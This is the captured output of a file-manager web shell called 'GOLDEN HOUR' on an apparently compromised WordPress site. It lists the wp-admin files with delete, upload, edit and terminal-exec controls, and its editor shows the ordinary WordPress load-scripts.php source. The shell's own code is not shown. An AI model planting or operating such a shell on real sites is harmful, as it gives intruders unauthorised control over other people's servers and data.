GOLDEN HOUR
DIR: /home/reseprot/public_html/tokomesinjakarta.com/wp-admin
UP
UPLOAD
Name
Size
Action
about.php
22.2 KB
DEL
admin-ajax.php
4.83 KB
DEL
admin-footer.php
2.76 KB
DEL
admin-functions.php
406 B
DEL
admin-header.php
8.7 KB
DEL
admin-post.php
1.63 KB
DEL
admin.php
12.13 KB
DEL
async-upload.php
4.58 KB
DEL
authorize-application.php
9.6 KB
DEL
comment.php
11.24 KB
DEL
credits.php
3.67 KB
DEL
[ css ]
-
DEL
custom-background.php
416 B
DEL
custom-header.php
426 B
DEL
customize.php
10.46 KB
DEL
edit-comments.php
13.74 KB
DEL
edit-form-advanced.php
28.29 KB
DEL
edit-form-blocks.php
10.71 KB
DEL
edit-form-comment.php
7.97 KB
DEL
edit-link-form.php
6.15 KB
DEL
edit-tag-form.php
10.18 KB
DEL
edit-tags.php
21.69 KB
DEL
edit.php
18.79 KB
DEL
erase-personal-data.php
7.11 KB
DEL
error_log
24.36 MB
DEL
export-personal-data.php
7.08 KB
DEL
export.php
10.74 KB
DEL
freedoms.php
4.4 KB
DEL
[ images ]
-
DEL
import.php
7.38 KB
DEL
[ includes ]
-
DEL
index.php
7.63 KB
DEL
install-helper.php
5.89 KB
DEL
install.php
16.5 KB
DEL
[ js ]
-
DEL
link-add.php
742 B
DEL
link-manager.php
4.15 KB
DEL
link-parse-opml.php
2.59 KB
DEL
link.php
2.7 KB
DEL
load-scripts.php
1.66 KB
DEL
load-styles.php
2.47 KB
DEL
[ maint ]
-
DEL
media-new.php
3.17 KB
DEL
media-upload.php
3.49 KB
DEL
media.php
5.5 KB
DEL
menu-header.php
9.68 KB
DEL
menu.php
15.9 KB
DEL
[ meta ]
-
DEL
moderation.php
307 B
DEL
ms-admin.php
196 B
DEL
ms-delete-site.php
4.18 KB
DEL
ms-edit.php
216 B
DEL
ms-options.php
223 B
DEL
ms-sites.php
215 B
DEL
ms-themes.php
217 B
DEL
ms-upgrade-network.php
219 B
DEL
ms-users.php
215 B
DEL
my-sites.php
4.56 KB
DEL
nav-menus.php
45.77 KB
DEL
[ network ]
-
DEL
network.php
5.32 KB
DEL
options-discussion.php
15.14 KB
DEL
options-general.php
14.66 KB
DEL
options-head.php
492 B
DEL
options-media.php
6.18 KB
DEL
options-permalink.php
19.35 KB
DEL
options-privacy.php
9.88 KB
DEL
options-reading.php
9.66 KB
DEL
options-writing.php
8.49 KB
DEL
options.php
12.51 KB
DEL
plugin-editor.php
13.11 KB
DEL
plugin-install.php
6.76 KB
DEL
plugins.php
28.58 KB
DEL
post-new.php
2.64 KB
DEL
post.php
9.87 KB
DEL
press-this.php
2.33 KB
DEL
privacy-policy-guide.php
3.52 KB
DEL
privacy.php
2.42 KB
DEL
profile.php
283 B
DEL
revision.php
5.43 KB
DEL
setup-config.php
16.46 KB
DEL
site-editor.php
4.22 KB
DEL
site-health-info.php
3.93 KB
DEL
site-health.php
9.54 KB
DEL
term.php
2.2 KB
DEL
theme-editor.php
14.85 KB
DEL
theme-install.php
21.8 KB
DEL
themes.php
45.28 KB
DEL
tools.php
3.41 KB
DEL
update-core.php
43.72 KB
DEL
update.php
12.79 KB
DEL
upgrade-functions.php
341 B
DEL
upgrade.php
5.47 KB
DEL
upload.php
13.77 KB
DEL
[ user ]
-
DEL
user-edit.php
34.19 KB
DEL
user-new.php
23.44 KB
DEL
users.php
21.03 KB
DEL
widgets-form-blocks.php
2.39 KB
DEL
widgets-form.php
18.94 KB
DEL
widgets.php
1.09 KB
DEL
Edit: load-scripts.php
<?php /* * Disable error reporting. * * Set this to error_reporting( -1 ) for debugging. */ error_reporting( 0 ); // Set ABSPATH for execution. if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', dirname( __DIR__ ) . '/' ); } define( 'WPINC', 'wp-includes' ); $protocol = $_SERVER['SERVER_PROTOCOL']; if ( ! in_array( $protocol, array( 'HTTP/1.1', 'HTTP/2', 'HTTP/2.0', 'HTTP/3' ), true ) ) { $protocol = 'HTTP/1.0'; } $load = $_GET['load']; if ( is_array( $load ) ) { ksort( $load ); $load = implode( '', $load ); } $load = preg_replace( '/[^a-z0-9,_-]+/i', '', $load ); $load = array_unique( explode( ',', $load ) ); if ( empty( $load ) ) { header( "$protocol 400 Bad Request" ); exit; } require ABSPATH . 'wp-admin/includes/noop.php'; require ABSPATH . WPINC . '/script-loader.php'; require ABSPATH . WPINC . '/version.php'; $expires_offset = 31536000; // 1 year. $out = ''; $wp_scripts = new WP_Scripts(); wp_default_scripts( $wp_scripts ); wp_default_packages_vendor( $wp_scripts ); wp_default_packages_scripts( $wp_scripts ); if ( isset( $_SERVER['HTTP_IF_NONE_MATCH'] ) && stripslashes( $_SERVER['HTTP_IF_NONE_MATCH'] ) === $wp_version ) { header( "$protocol 304 Not Modified" ); exit; } foreach ( $load as $handle ) { if ( ! array_key_exists( $handle, $wp_scripts->registered ) ) { continue; } $path = ABSPATH . $wp_scripts->registered[ $handle ]->src; $out .= get_file( $path ) . "\n"; } header( "Etag: $wp_version" ); header( 'Content-Type: application/javascript; charset=UTF-8' ); header( 'Expires: ' . gmdate( 'D, d M Y H:i:s', time() + $expires_offset ) . ' GMT' ); header( "Cache-Control: public, max-age=$expires_offset" ); echo $out; exit;
SAVE FILE
TERMINAL
EXEC